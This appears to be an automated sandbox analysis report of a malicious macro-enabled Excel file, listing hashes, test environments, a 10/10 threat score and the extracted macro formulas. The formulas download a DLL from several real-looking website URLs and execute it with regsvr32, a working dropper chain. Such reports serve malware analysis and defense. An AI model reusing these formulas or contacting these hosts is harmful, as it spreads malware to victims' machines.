General
-
Target
9e940cff8c32a5b77aff650974d5ea74e5a9b5001ee8bbbd53f5a6201782759e
-
Size
29KB
-
Sample
241111-wxm1jsslex
-
MD5
e8fa2d22a2b5212d6f9f95cc2997a305
-
SHA1
351dd4d60dc0be89a5d39a79b94aa7958fcadcce
-
SHA256
9e940cff8c32a5b77aff650974d5ea74e5a9b5001ee8bbbd53f5a6201782759e
-
SHA512
b411085384f9ed60890052364ffa177e0c62307b77f1540026bd6ff8e6587bcc024593bd05a30cc852b7070d3cac993b237e561eef3b39ee27e669decabd4909
-
SSDEEP
384:tvANFOv+7UaivQ2BNZJibbwBUA6+h4wyqJeAqcctU1jrYsu8HP7jFFtCvI:1qUtVNZAXby9y+cccS1AsuIjxl
Behavioral task
behavioral1
Sample
9e940cff8c32a5b77aff650974d5ea74e5a9b5001ee8bbbd53f5a6201782759e.xlsm
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
9e940cff8c32a5b77aff650974d5ea74e5a9b5001ee8bbbd53f5a6201782759e.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://iqraacfindia.org/wp-admin/dG/","..\whxc.dll",0,0)
=IF('IJEGVS'!H16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://he.adar-and-ido.com/wp-admin/xk7D/","..\whxc.dll",0,0))
=IF('IJEGVS'!H18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.digigoal.fr/wp-admin/VfU0aIj/","..\whxc.dll",0,0))
=IF('IJEGVS'!H20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/","..\whxc.dll",0,0))
=IF('IJEGVS'!H22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://al-brik.com/vb/mMQlbHPCX/","..\whxc.dll",0,0))
=IF('IJEGVS'!H24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/","..\whxc.dll",0,0))
=IF('IJEGVS'!H26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://biantarajaya.com/awstats-icon/VR5wDEvBj/","..\whxc.dll",0,0))
=IF('IJEGVS'!H28<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\whxc.dll")
=RETURN()
Targets
-
-
Target
9e940cff8c32a5b77aff650974d5ea74e5a9b5001ee8bbbd53f5a6201782759e
Score
10/10